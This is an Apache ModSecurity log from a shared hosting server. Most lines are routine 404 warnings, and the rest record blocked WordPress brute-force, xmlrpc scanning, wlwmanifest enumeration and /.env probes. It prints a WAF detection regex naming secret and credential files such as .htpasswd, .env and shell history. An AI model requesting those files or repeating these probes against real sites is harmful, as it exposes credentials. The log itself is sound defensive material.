[Tue May 26 17:50:48.722351 2026] [security2:error] [pid 937900:tid 938131] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbQDQAA6ks"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.725103 2026] [security2:error] [pid 937900:tid 938141] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbQBgAA9Cs"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.728731 2026] [security2:error] [pid 937900:tid 938087] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbQEgAAvl4"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.731552 2026] [security2:error] [pid 937900:tid 938126] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP-gAA5T8"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.731911 2026] [security2:error] [pid 937900:tid 938106] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbQDgAA0Vs"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.732088 2026] [security2:error] [pid 937900:tid 938030] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP5AAAhRM"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.732110 2026] [security2:error] [pid 937900:tid 938157] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP-wABBEk"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.732306 2026] [security2:error] [pid 937900:tid 938046] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbQAgAAlUY"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.732330 2026] [security2:error] [pid 937900:tid 938146] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP4gAA-Rw"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.732488 2026] [security2:error] [pid 937900:tid 938056] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP5QAAnxg"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.733278 2026] [security2:error] [pid 937900:tid 938057] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbQAwAAoCY"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.733314 2026] [security2:error] [pid 937900:tid 938128] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbQCwAA50w"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.733428 2026] [security2:error] [pid 937900:tid 938116] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbQDwAA21M"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.735119 2026] [security2:error] [pid 937900:tid 938079] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbQFAAAtl8"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.741662 2026] [security2:error] [pid 937900:tid 938124] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbQEQAA41o"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.742704 2026] [security2:error] [pid 937900:tid 938110] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP4wAA1Rs"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.743907 2026] [security2:error] [pid 937900:tid 937927] [remote 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP5wAA-xo"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.743922 2026] [security2:error] [pid 937900:tid 938156] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP_AABA0I"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.744322 2026] [security2:error] [pid 937900:tid 938119] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP4AAA3mE"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.745032 2026] [security2:error] [pid 937900:tid 938089] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbQCQAAwEo"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.745126 2026] [security2:error] [pid 937900:tid 938112] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbQEwAA12Q"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.746099 2026] [security2:error] [pid 937900:tid 938042] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP7wAAkUA"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.984112 2026] [security2:error] [pid 937900:tid 938078] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbP-AAAtUM"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:48.987379 2026] [security2:error] [pid 937900:tid 938037] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbQEAAAjHM"], referer: https://ndequipments.com/used-tractors/
[Tue May 26 17:50:49.105144 2026] [security2:error] [pid 937900:tid 938118] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQIE4hPNS8CpkGLtbQFwAAAN0"]
[Tue May 26 17:50:51.389985 2026] [security2:error] [pid 937900:tid 938078] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQIk4hPNS8CpkGLtbQTwAAALU"]
[Tue May 26 17:50:53.607432 2026] [security2:error] [pid 937900:tid 938088] [client 149.143.156.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWQJE4hPNS8CpkGLtbQbgAAAL8"]
[Tue May 26 17:50:53.638494 2026] [security2:error] [pid 937900:tid 938035] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQJU4hPNS8CpkGLtbQigAAAIo"]
[Tue May 26 17:50:54.100787 2026] [security2:error] [pid 937900:tid 938000] [remote 209.42.20.53:41184] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWQJU4hPNS8CpkGLtbQpwAAxGM"]
[Tue May 26 17:50:54.118552 2026] [security2:error] [pid 937900:tid 938156] [client 54.36.100.31:64706] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "amslca.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWQJk4hPNS8CpkGLtbQqQAAAQM"]
[Tue May 26 17:50:54.802352 2026] [security2:error] [pid 937900:tid 938076] [client 54.36.100.31:50022] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.100.36.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "amslca.com"] [uri "/xmlrpc.php"] [unique_id "ahWQJk4hPNS8CpkGLtbQugAAALM"]
[Tue May 26 17:50:55.123198 2026] [security2:error] [pid 937900:tid 938067] [client 54.36.100.31:51134] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "amslca.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWQJ04hPNS8CpkGLtbQyQAAAKo"]
[Tue May 26 17:50:55.441182 2026] [security2:error] [pid 937900:tid 938057] [client 54.36.100.31:51631] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "amslca.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWQJ04hPNS8CpkGLtbQ0wAAAKA"]
[Tue May 26 17:50:55.762784 2026] [security2:error] [pid 937900:tid 938072] [client 54.36.100.31:52163] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "amslca.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWQJ04hPNS8CpkGLtbQ1wAAAK8"]
[Tue May 26 17:50:56.081832 2026] [security2:error] [pid 937900:tid 938156] [client 54.36.100.31:52753] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "amslca.com"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahWQKE4hPNS8CpkGLtbQ4gAAAQM"]
[Tue May 26 17:50:56.401845 2026] [security2:error] [pid 937900:tid 938098] [client 54.36.100.31:53376] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "amslca.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWQKE4hPNS8CpkGLtbQ8QAAAMk"]
[Tue May 26 17:50:56.522812 2026] [security2:error] [pid 937900:tid 938128] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQKE4hPNS8CpkGLtbQ5AAAAOc"]
[Tue May 26 17:50:56.729436 2026] [security2:error] [pid 937900:tid 938084] [client 54.36.100.31:54110] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "amslca.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWQKE4hPNS8CpkGLtbQ-gAAALs"]
[Tue May 26 17:50:57.056792 2026] [security2:error] [pid 937900:tid 938100] [client 54.36.100.31:54856] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "amslca.com"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahWQKU4hPNS8CpkGLtbRAgAAAMs"]
[Tue May 26 17:50:57.384656 2026] [security2:error] [pid 937900:tid 938070] [client 54.36.100.31:55683] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "amslca.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWQKU4hPNS8CpkGLtbRBgAAAK0"]
[Tue May 26 17:50:58.564332 2026] [security2:error] [pid 937900:tid 938061] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQKk4hPNS8CpkGLtbRIQAAAKQ"]
[Tue May 26 17:51:00.808521 2026] [security2:error] [pid 937900:tid 938044] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQLE4hPNS8CpkGLtbRUAAAAJM"]
[Tue May 26 17:51:02.025220 2026] [security2:error] [pid 937900:tid 937922] [remote 144.172.116.102:56550] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "valodico.com"] [uri "/.env"] [unique_id "ahWQLk4hPNS8CpkGLtbRgQAAlhU"]
[Tue May 26 17:51:02.184410 2026] [security2:error] [pid 937900:tid 938152] [client 144.172.116.102:46766] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.85"] [uri "/.env"] [unique_id "ahWQLk4hPNS8CpkGLtbRggAAAP8"]
[Tue May 26 17:51:02.592199 2026] [security2:error] [pid 937900:tid 938078] [client 74.7.175.179:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.digitalgerminate.com"] [uri "/index.php"] [unique_id "ahWQLU4hPNS8CpkGLtbRYwAAtQQ"]
[Tue May 26 17:51:02.592237 2026] [security2:error] [pid 937900:tid 938078] [client 74.7.175.179:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.digitalgerminate.com"] [uri "/index.php"] [unique_id "ahWQLU4hPNS8CpkGLtbRYwAAtQQ"]
[Tue May 26 17:51:03.075039 2026] [security2:error] [pid 937900:tid 938061] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQLk4hPNS8CpkGLtbRmAAAAKQ"]
[Tue May 26 17:51:03.530476 2026] [security2:error] [pid 937900:tid 937906] [remote 42.116.123.127:24375] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.123.116.42.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWQL04hPNS8CpkGLtbRrQAAjgU"]
[Tue May 26 17:51:05.352930 2026] [security2:error] [pid 937900:tid 938032] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQME4hPNS8CpkGLtbR1QAAAIc"]
[Tue May 26 17:51:07.096751 2026] [security2:error] [pid 937900:tid 937966] [remote 82.223.24.195:35192] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 195.24.223.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWQMk4hPNS8CpkGLtbSAgAAxEE"]
[Tue May 26 17:51:07.705767 2026] [security2:error] [pid 937900:tid 938128] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQM04hPNS8CpkGLtbSDgAAAOc"]
[Tue May 26 17:51:09.087108 2026] [security2:error] [pid 937900:tid 938033] [client 181.214.6.78:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWQNU4hPNS8CpkGLtbSQQAAAIg"]
[Tue May 26 17:51:10.134904 2026] [security2:error] [pid 937900:tid 938068] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQNU4hPNS8CpkGLtbSUwAAAKs"]
[Tue May 26 17:51:11.271066 2026] [security2:error] [pid 937900:tid 938108] [client 43.164.196.244:57850] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWQN04hPNS8CpkGLtbSfQAAANM"]
[Tue May 26 17:51:12.462604 2026] [security2:error] [pid 937900:tid 938055] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQOE4hPNS8CpkGLtbSkgAAAJ4"]
[Tue May 26 17:51:14.684571 2026] [security2:error] [pid 937900:tid 938103] [client 157.143.84.87:42286] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWQOk4hPNS8CpkGLtbSzQAAAM4"]
[Tue May 26 17:51:14.813905 2026] [security2:error] [pid 937900:tid 938071] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQOk4hPNS8CpkGLtbSywAAAK4"]
[Tue May 26 17:51:16.734849 2026] [security2:error] [pid 937900:tid 938009] [remote 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTKwAAwWw"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:16.825439 2026] [security2:error] [pid 937900:tid 938153] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTGwAAAQA"]
[Tue May 26 17:51:16.863009 2026] [security2:error] [pid 937900:tid 938078] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTLQAAtXg"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:16.890054 2026] [security2:error] [pid 937900:tid 938131] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTNwAA6n4"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:16.897853 2026] [security2:error] [pid 937900:tid 938150] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTLwAA_XU"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:16.903569 2026] [security2:error] [pid 937900:tid 938156] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTPQABA2A"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:16.904330 2026] [security2:error] [pid 937900:tid 938083] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTPwAAumc"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
[Tue May 26 17:51:16.910950 2026] [security2:error] [pid 937900:tid 938048] [client 142.188.241.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWQPE4hPNS8CpkGLtbTMwAAlzE"], referer: https://ndequipments.com/listings/2016-john-deere-2025r-loader-backhoe-front-snowblower-package/
